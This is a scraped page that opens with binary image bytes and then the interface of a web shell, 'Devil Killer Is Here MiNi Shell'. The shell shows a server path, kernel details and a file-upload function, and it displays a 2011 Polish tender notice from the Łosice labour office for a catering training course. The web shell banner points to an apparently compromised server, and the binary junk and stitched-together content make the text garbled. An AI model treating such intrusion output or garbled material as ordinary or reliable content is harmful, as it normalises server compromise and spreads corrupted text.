JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110308/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110308/38230-N-2011.html

<p class="kh_header"><b>Łosice: usługa szkoleniowa</b><br>
<b>Numer ogłoszenia: 38230 - 2011; data zamieszczenia: 08.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Łosicach , ul. Narutowicza 6, 08-200 Łosice, woj. mazowieckie, tel. 083 3573330, faks 083 3573330.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> walo@praca.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługa szkoleniowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia Kurs gastronomiczny- organizacja przyjęć okolicznościowych dla 12 osób zarejestrowanych w Powiatowym Urzędzie Pracy w Łosicach 
w zakresie dwóch modułów.
Moduł pierwszy: zasady przygotowania  i organizacji przyjęć okolicznościowych,
	podstawowe zagadnienia związane z wyżywieniem i gastronomią,
	przygotowanie gastronomicznej strony przyjęcia i cateringu,
	fachowa obsługa przyjęć, w tym dekoracja stołów i potraw, obsługa kelnerska imprezy.
Moduł drugi: przygotowanie i organizacja konferencji na 50 osób,
przygotowania i dostarczenie cateringu na konferencję i ekspozycja dań regionalnych,obsługa kelnerska konferencji.
Celem szkolenia jest teoretyczne i praktyczne przygotowanie uczestników kursu do organizacji przyjęć okolicznościowych oraz zapewnienia gastronomicznej obsługi przyjęć i  przygotowania cateringu na tego rodzaju imprezy. Efektem szkolenia powinno być zwiększenie szans absolwentów szkolenia  na znalezienie zatrudnienia czy to na umowę, umowę   zlecenie czy umowę o dzieło lub na podjęcie własnej działalności czy założenie spółdzielni socjalnej w branży gastronomicznej. 
Szkolenie realizowane będzie w ramach projektu współfinansowanego z Europejskiego Funduszu Społecznego pod nazwą Smak  pracy  Priorytetu VI Rynek pracy otwarty dla wszystkich, Działanie 6.3 Inicjatywy lokalne na rzecz podnoszenia poziomu aktywności zawodowej na obszarach wiejskich Programu Operacyjnego Kapitał Ludzki.
Miejsce odbywania kursu:  Łosice. 
Termin  realizacji szkolenia : kwiecień - czerwiec 2011 r.
 Liczba godzin szkolenia: minimum 220 godzin zegarowych, w tym 220 godzin 
dydaktycznych  plus przerwy (czas przeznaczony na realizację  dwóch modułów szkolenia).
 Podstawowe  zagadnienia, jakie powinien zawierać plan nauczania, zawarty w programie szkolenia:
Moduł pierwszy:
a)	zasady przygotowania i organizacji  przyjęć okolicznościowych - około 30 godz:
zasady organizacji przyjęć okolicznościowych, przyjmowanie zleceń na organizację przyjęć i imprez różnego rodzaju, ustalenie zestawu dań w uzgodnieniu ze zleceniodawcą, przygotowywanie kalkulacji kosztów przyjęcia lub imprezy, organizacja dostaw surowców i półproduktów niezbędnych do wykonania usługi, organizacja  dostaw cateringu pod zamówienie klienta,  rozliczanie kosztów (prowadzenie podstawowej dokumentacji rachunkowej)
b)	podstawowe zagadnienia związane z wyżywieniem i gastronomią -około 15 godz:
podstawowe zasady żywieniowe oraz  zasady BHP i HACCP przy żywieniu zbiorowym, wyposażenie techniczne zakładu gastronomicznego, organizacja stanowiska pracy kucharza małej gastronomii, podstawowe zasady funkcjonowania punktu gastronomicznego
c)	przygotowanie  gastronomicznej strony przyjęcia i cateringu - około 95 godz:
technologia gastronomiczna (dobór surowców i półproduktów oraz przeprowadzenie ich  dalszej obróbki, w tym obróbki termicznej), samodzielne sporządzanie różnymi technikami i metodami potraw, napojów i wyrobów garmażeryjnych, przygotowanie potraw kuchni tradycyjnej i regionalnej (potrawy Polski wschodniej - kuchni kresowej, podlaskiej, np. typu : pierogi ruskie, barszcz ukraiński i grzybowy, baby i kiszki ziemniaczane, kulebiak, kutia, bigos myśliwski itd. ) na miejscu i na wynos, wykorzystanie odpowiedniego sprzętu i urządzeń przy sporządzaniu potraw 
d)	fachowa obsługa przyjęć, w tym dekoracja stołów i potraw  i obsługa kelnerska imprezy około 25 godz:
dobór zastawy, bielizny stołowej i sprzętu do obsługi gości,  dobór materiałów niezbędnych do zdobienia i wystroju stołów i potraw,  praktyczna dekoracja stołów i potraw z wykorzystaniem podstawowych zasad dekoracji, zastosowanie elementów typu: świece, kwiaty, karty dań, wizytówki, serwetki, zasady serwowania potraw, w tym cateringu,  zasady obsługi klienta podczas przyjęcia z elementami autoprezentacji i savoir vivre (właściwa prezencja, dbałość o strój i wygląd w trakcie pracy).  
Moduł  drugi:  około 35 godzin:

a)	przygotowanie i organizacja konferencji na 50 osób: 
przygotowanie sali wskazanej przez Zleceniodawcę na konferencję, ustawienie i dekoracja stołów, wynajem nakryć stołowych i przygotowanie zastawy stołowej

b)	przygotowanie i dostarczenie cateringu na konferencję i ekspozycja dań regionalnych: 
      przygotowanie dań cateringowych, w tym dań regionalnych na konferencję, zapewnienie dowozu cateringu na konferencję, estetyczna ekspozycja dań regionalnych z wykorzystaniem stołu szwedzkiego

d)   obsługa kelnerska konferencji:
      serwowanie dań dostarczonych w ramach cateringu, zapewnienie porządku po
      konferencji, rozliczenie kosztów konferencji. 

Pierwszy moduł powinien kończyć się egzaminem z wiedzy teoretycznej. Egzaminem z części praktycznej będzie udział w przygotowaniu i obsłudze konferencji. 
Dopuszcza się modyfikacje programu, jeżeli chodzi o kolejność  poszczególnych zagadnień i ewentualne dodanie pewnych elementów. Dopuszczalne są niewielkie (nie przekraczające 15 % ) przesunięcia, jeżeli chodzi o godziny realizacji poszczególnych modułów. Zajęcia mają być prowadzone w formie wykładów oraz ćwiczeń i warsztatów, z przewagą zajęć praktycznych w proporcji co najmniej 1:3. 

W trakcie kursu uczestnicy kursu powinni mieć szansę na wykazanie się inicjatywą, kreatywnością, rozwijać własne talenty kulinarne i artystyczne. Kurs ma łączyć tradycję z nowoczesnością poprzez ukazanie nowych trendów w wystroju stołów i dań, nowych trendów w serwowaniu dań (stół szwedzki, catering).
 
Absolwenci  kursu powinni znać:  zasady organizacji przyjęć,  podstawowe zasady BHP i HACCP przy produkcji, przechowywaniu i obrocie środkami spożywczymi, zasady organizacji  pracy w gastronomii, zasady żywienia, technologię przygotowania produktów gastronomicznych. Absolwenci kursu powinni umieć praktycznie: przygotować stanowisko pracy, produkty spożywcze do dalszej obróbki, posłużyć się narzędziami i sprzętem zmechanizowanym, sporządzić menu w uzgodnieniu z klientem, sporządzić serwowane dania, w tym dania regionalne, odpowiednio nakryć i udekorować stoły i dania,  obsłużyć klienta, przygotować dania na wynos pod zamówienie klienta, poprowadzić podstawową dokumentację związaną ze sprzedażą.      
             
Plan nauczania powinien zawierać elementy wskazane przez Zamawiającego i szerzej uwzględniać   standardy kwalifikacji zawodowych   w zawodzie organizator usług gastronomicznych, organizator usług cateringowych, kucharz, kucharz małej gastronomii, kelner zawarte na stronie www.kwalifikacje.praca.gov.pl 
Zakłada się organizację zajęć w każdym tygodniu  (biorąc pod uwagę pełne tygodnie),  z pominięciem niedziel i świąt, w oparciu o plan nauczania obejmujący co najmniej 25 godzin zegarowych na każdego uczestnika kursu w tygodniu (godzina zegarowa liczy 60 minut i obejmuje zajęcia dydaktyczne liczące 45 minut oraz przerwę, liczącą średnio 15 minut; długość przerwy może być ustalana w sposób elastyczny). Zajęcia powinny być zorganizowane w godzinach od 8.00 do 18.00, w wymiarze  5-7  godzin dydaktycznych w ciągu dnia od poniedziałku do piątku. Dopuszcza się organizację zajęć w soboty, z możliwością pominięcia zajęć w innym dniu tygodnia. Nie przewiduje się przerwy pomiędzy modułami szkolenia. Po zakończeniu modułu I uczestnicy kursu ustalają ze Zleceniodawcą menu na konferencje, zajmują się  dostawą produktów i przygotowaniem dań na konferencję, przygotowują salę wskazaną przez Zleceniodawcę, organizują dostawę cateringu i zapewniają obsługę kelnerską imprezy.    
Sala wykładowa powinna być dostosowana do grupy 12 uczestników i spełniać wymogi BHP oraz posiadać zaplecze sanitarne (WC, umywalka, salę lub kącik do spożycia posiłku); powinna być wyposażona w sprzęt dydaktyczny: tablicę do pisania lub flipchart,  diaskop lub  rzutnik multimedialny. 
Sala wykładowa powinna posiadać profesjonalne zaplecze technologiczne, umożliwiające przygotowywanie posiłków na gorąco i zimno w ramach zajęć praktycznych. Zaplecze technologiczne powinno być wyposażone w minimum 2 duże kuchenki gazowe lub elektryczne, sprzęt i naczynia kuchenne niezbędnie do przyrządzania potraw, urządzenia chłodnicze do przechowywania produktów spożywczych i potraw. 
Na zajęciach należy wykorzystać  materiały dydaktyczne typu podręczniki,  foliogramy lub prezentacje multimedialne dotyczące zakresu szkolenia (prezentacje dotyczące produktów spożywczych, dań, wystroju stołów i potraw), materiały pomocnicze do dekoracji stołów i potraw (typu: świeczniki, serwetniki, flakony z kwiatami, ozdobne karty dań i wizytówki itd.) świeże i wysokiej jakości produkty  spożywcze do przygotowania potraw i rekwizyty do serwowania potraw (nakrycia stołowe, zastawa stołowa, tace, klosze na ciasto).
Każdy z uczestników musi otrzymać niezbędne materiały dydaktyczne na własność: podręczniki lub skrypty dotyczące zakresu szkolenia  z   uwzględnieniem albumu dań gastronomicznych i albumu dotyczącego dekoracji stołów z okazji przyjęć okolicznościowych i dekoracji potraw ,  materiały do sporządzania notatek, strój ochronny do realizacji zajęć praktycznych (wskazane materiały mają być wysokiej jakości, np albumy w kolorze, na papierze kredowym, stój ochronny kompletny, dopuszczony do pracy w punkcie gastronomicznym) .
Uczestnicy kursu spoza Łosic na zajęciach teoretycznych mają mieć zapewniony catering  ( jeden ciepły posiłek, kawa i  herbata, zimne napoje, ciasteczka). W dniu, gdy realizowane są warsztaty uczestnicy kursu mają zapewniony tylko serwis kawowy, natomiast jako ciepły posiłek spożywają dania przygotowane przez siebie w trakcie zajęć praktycznych. 
Uczestnicy konferencji mają mieć zapewniony gorący posiłek (tradycyjne danie pierwsze i drugie, klasycznie podane oraz zapewniony  dostęp do stołu szwedzkiego, na którym będą prezentowane potrawy regionalne w ilości zapewniającej degustację wszystkim uczestnikom konferencji.  Dodatkowo uczestnicy konferencji będą mieli zapewnioną kawę  i  herbatę, zimne napoje oraz ciasta wypiekane przez kursantów. Konferencja ma być okazją do zaprezentowania zdobytych przez uczestników kursu umiejętności kulinarnych, dekoracyjnych, kelnerskich i organizacyjnych. 
Kadra dydaktyczna wskazana przez wykonawców powinna posiadać odpowiednie kwalifikacje zawodowe i uprawnienia do prowadzenia zajęć w powierzonym sobie zakresie. 
 Wykładowcy przedmiotów teoretycznych powinni posiadać wykształcenie minimum wyższe zawodowe, związane z powierzonym im zakresem szkolenia, co najmniej roczne doświadczenie w nauczaniu danego przedmiotu w szkole lub dwuletnie  doświadczenie w pracy w zakresie tożsamym bądź przeprowadzili minimum trzy szkolenia w zakresie objętym przedmiotem zamówienia, który będą realizować. Wykładowcy/instruktorzy na zajęciach praktycznych powinni posiadać minimum średnie wykształcenie związane ze specyfiką szkolenia  i odpowiednie uprawnienia, jeżeli są wymagane  danym zakresie. Wymagane jest doświadczenie analogiczne jak w przypadku wykładowców przedmiotów teoretycznych.  
Szkolenie powinno mieć opiekuna z ramienia Wykonawcy, czyli osobę odpowiedzialną za organizację szkolenia, wskazaną do kontaktu z uczestnikami szkolenia oraz Zamawiającym.
Wskazana osoba ma czuwać nad sprawnym przebiegiem szkolenia i odpowiadać za organizację konferencji.
Szkolenie kończy się przeprowadzeniem ankiety oceniającej szkolenie, oceną nabytych umiejętności i wydaniem zaświadczenia ukończenia kursu zgodnie z rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych lub innego dokumentu, potwierdzającego ukończenie szkolenia. 
W związku z realizacją szkolenia w ramach projektu współfinansowanego ze środków  Unii Europejskiej w ramach Europejskiego Funduszu Społecznego należy wydać zaświadczenie z logo EFS i Kapitału Ludzkiego lub inny dokument z  logo EFS i Kapitału Ludzkiego i informacją o źródle finansowania.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy powinni udokumentować, że posiadają uprawnienia do szkolenia osób bezrobotnych i poszukujących pracy, zarejestrowanych w urzędach pracy (zgodnie z art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy) poprzez przedłożenie zaświadczenia o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy, właściwy ze względu na siedzibę instytucji  szkoleniowej.Spełnienie wymaganego warunku oceniane będzie na podstawie treści wymaganego dokumentu, zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy powinni udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie, że w ostatnich trzech latach do dnia składania ofert, a jeżeli okres prowadzenia działalności był krótszy to w tym okresie zrealizowali na zlecenie innych instytucji należycie co najmniej trzy zawodowe szkolenia grupowe, w tym co najmniej jedno w żądanym lub zbliżonym zakresie tematycznym Kurs gastronomiczny organizacja przyjęć okolicznościowych lub w jednym z zakresów, które obejmuje szkolenie, np. kurs kuchmistrza, kurs organizatora przyjęć okolicznościowych.   W tym celu należy przedłożyć Wykaz wykonanych usług - przeprowadzonych przez wykonawcę w ostatnich trzech latach przed upływem terminu  składania ofert na zlecenie innych instytucji zawodowych szkoleń grupowych, w tym co najmniej jednego w żądanym lub zbliżonym zakresie z podaniem wartości przedmiotu zamówienia, dat wykonania,  liczby odbiorców usług, wskazaniem zleceniodawców (do wykazanych szkoleń należy dołączyć referencje lub inne dokumenty, potwierdzające należyte wykonanie usługi) a w przypadku krótszego okresu prowadzenia działalności  wykaz szkoleń prowadzonych w tym okresie (zał. nr 3 do SIWZ). Spełnienie wymaganego warunku oceniane będzie na podstawie treści wymaganego dokumentu, zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy powinni wykazać, że dysponują  salą wykładową  dostosowaną do grupy 12  uczestników i spełniającą wymogi BHP oraz  posiadającą zaplecze sanitarne (WC, umywalka, sala lub kącik do spożycia posiłku); sala powinna być wyposażona w sprzęt dydaktyczny, niezbędny do prowadzenia zajęć w tym: tablicę lub filipchart, rzutnik pisma lub projektor multimedialny. Wykonawcy powinni tez  dysponować nowoczesnym zapleczem technologicznym, umożliwiającym przygotowywanie gorących i zimnych potraw i cateringu w ramach zajęć praktycznych. Zaplecze technologiczne powinno być wyposażone w minimum 2 duże kuchenki gazowe lub elektryczne, sprzęt (mikser, krajalnica itp. ) i naczynia kuchenne niezbędnie do przyrządzania potraw, urządzenie chłodnicze do przechowywania produktów spożywczych i potraw. W tym celu powinni przedłożyć Wykaz niezbędnej do wykonania zamówienia bazy lokalowej i techniczno-dydaktycznej (sprzętu  i urządzeń), jakimi dysponuje wykonawca z informacją o podstawie dysponowania tymi zasobami. W przypadku gdy zaproponowana baza lokalowa i wykazany przed wykonawcę sprzęt dydaktyczny nie są własnością wykonawcy należy przedstawić pisemne oświadczenie lub umowę najmu podmiotu wynajmującego zasoby (zał. nr  3 do Formularza Ofertowego).Spełnienie wymaganego warunku oceniane będzie na podstawie treści wymaganego dokumentu, zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy powinni wykazać, że kadra dydaktyczna, którą dysponują, posiada odpowiednie kwalifikacje zawodowe i uprawnienia do prowadzenia zajęć w powierzonym sobie zakresie. Wskazani wykładowcy przedmiotów teoretycznych  powinni posiadać wykształcenie minimum wyższe zawodowe, związane z powierzonym im zakresem szkolenia, co najmniej roczne doświadczenie w nauczaniu danego przedmiotu w szkole lub co najmniej dwuletnie doświadczenie w pracy w zakresie tożsamym bądź przeprowadzili minimum trzy szkolenia w zakresie objętym przedmiotem zamówienia, który będą realizować. Wykładowcy, instruktorzy na zajęciach praktycznych powinni posiadać wykształcenie minimum średnie zawodowe, związane ze specyfiką szkolenia  i odpowiednie uprawnienia, jeżeli są wymagane  danym zakresie. Wymagane jest doświadczenie analogiczne jak w przypadku wykładowców przedmiotów teoretycznych. W tym celu należy przedłożyć Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, wykształcenia, specjalności, posiadanych uprawnień i doświadczenia zawodowego niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności. Należy dołączyć pełne CV wykładowców (zawierające dokładny opis doświadczenia zawodowego) z kopiami dyplomów i dokumentów, potwierdzających wymagane wykształcenie i uprawnienia w zakresie objętym umową wraz z  pisemnym oświadczeniem każdej z osób, nie będących pracownikami wykonawcy, że wyrażają zgodę na prowadzenie szkolenia. (zał. nr 4 i 4.1 do Formularza Ofertowego).Spełnienie wymaganego warunku oceniane będzie na podstawie treści wymaganego dokumentu, zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego warunku w tym zakresie. Ocena na podstawie Oświadczenia, że wykonawca spełnia warunki określone w art. 22 ust.1  ustawy Prawo zamówień publicznych (zał. nr 2 do SIWZ) zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zaświadczenie o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy , właściwy ze względu na siedzibę instytucji szkoleniowej</p>
